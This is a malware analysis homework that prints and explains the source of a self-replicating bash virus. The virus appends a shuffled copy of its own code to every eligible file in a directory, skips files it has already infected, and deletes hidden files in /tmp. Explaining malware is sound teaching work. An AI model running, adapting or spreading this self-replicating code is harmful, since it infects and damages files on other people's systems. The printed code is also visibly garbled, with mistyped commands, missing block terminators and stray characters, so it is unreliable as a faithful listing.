Malware analysis and design Homework No. 2

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The bash code given as assignment is a appending virus that copies his own code after the target file code, if this isn't already infected. Below we explain in detail the virus behavior.

```
if [ \$1" == "test" ]; then \#@1// If the first parameter is equals to "test" exit and
  exit 0 #@2
                   // return 0 because the file is already infected
   #@3
MANAGER=(test cd ls pwd)
                         #04 // Array of 4 elements, used as temporary file names
RANDOM=$$ #05 // Reseed the random number generator using virus process ID
                         // For each file in the directory
for target in *; do #06
 nbline=$(wc -1 $target)
                          #@7
                                 // Count the number of the target file
 nbline=${nbline##} #@8 // Trim the left side of the string
 nbline=$(echo $nbline | cut -d " " -f1) #@9 // and retrives the number of lines
 nbline=$(echo $nbline | cut -d " " -f1) #@9
                                                  // and retrive the number of lines
  // Checks if the chosen file has less number of lines of the virus.
  // If it is true continue with another file
  if [ $(($nbline)) -lt 39 ]; then #010
    continue #011
     #@12
  // Choose the name of the new file from one of the value contained in MANAGER, randomly.
 NEWFILE=${MANAGER[$((RANDOM % 4))]} #@13
  // Takes the last 36 lines of target and sort them with ordering based on the number
    after @.
  // It restores the code in the original order and writes the output in an hidden
    temporary file. (name chosen in the previous line)
  tail -n 36 $target | awk '{ print($NF" "$0) }' | cut -d"@" -f2- | sort -g | cut -d" " -
   f2- > /tmp/".$NEWFILE"
                           #@14
  // Gives to /tmp/\ /"$NEWFILE"
                                  the execution permission and execute it redirecting
    stderr to /\text{dev/null}
  chmod +x /tmp/". $NEWFILE" && /tmp/". $NEWFILE" test 2> /dev/null; #@15
  // Checks the exit code of the last command executed: if it correspond to the virus it
   returns 0 (see first 3 lines) and continue, because the file is already infected.
  if [ "$?" == "0" ]; then
                            #@16
    continue #017
     #@18
  // Choose the name of the new file from one of the value contained in MANAGER, randomly.
 NEWFILE=${MANAGER[$((RANDOM % 4))]}
                                       #@19
  // Path of the just created file
 NEWFILE = "/tmp/. $NEWFILE"
                            #@20
  // Appends to the target file the nexts 3 lines of code that will be executed
                                                                                 when the
    target file will be run: this lines gets the last 36 lines of target (the virus) and
    executes it in background: there three lines are used for the infection phase; re-order
    the last 36 lines of the infected file and execute them.
  echo "tail -n 36 $0 | awk '{ print(\$NF\"
                                            \"\$0) }' | cut -d\"@\" -f2- | sort -g | cut -
    d\" \" -f2- > $NEWFILE" >> $target #@21
  echo "chmod +x $NEWFILE && $NEWFILE &" >> $target
  echo "exit 0" >> $target #@23
 // Creates am array of 37 elements: first element "FT" and the last " \mbox{\tt "}
 tabft=("FT" [36]=" ") #024
  declare -i nbl=0 #@25 // Creates an integer variable nbl=0
  while [ $nbl -ne 36 ]; do #@26 // while (nbl != 36)
    valindex=$(((RANDOM % 36)+1)) #027
                                           // Generates a random number from 1 to 36
    // while tabft[valindex] == "FT" then choose a new number for valindex, that is a new
       line to append
    while [ "${tabft[$valindex]}" == "FT" ]; do
      valindex=$(((RANDOM % 36) + 1))
    done #@30
    // Takes the last (n - valindex)-line of the virus
    line=$(tail -n $valindex $0 | head -1)
    // Appends the line to the target file
    echo -e "$line" >> $target
                               #@32
    // Increment the counter and sign the valindex cell of tabft as appended
    nbl=$(($nbl+1)) && tabft[$valindex]="FT"
  done #@34
    #@35
rm /tmp/.* 2> /dev/null #@36 // Removes all hidden temporary files
```

The lines 1-3 and 14-18 deal with preventing over-infection: the virus executes a file and if it returns 0 it is already infected. The lines 19-34 identify the infection phase: initially the virus appends to the target file the code used to trigger the infection and finally the virus shuffles its own code and appends it to the target file: this is the implemented polymorphic mechanism. The virus has no payload.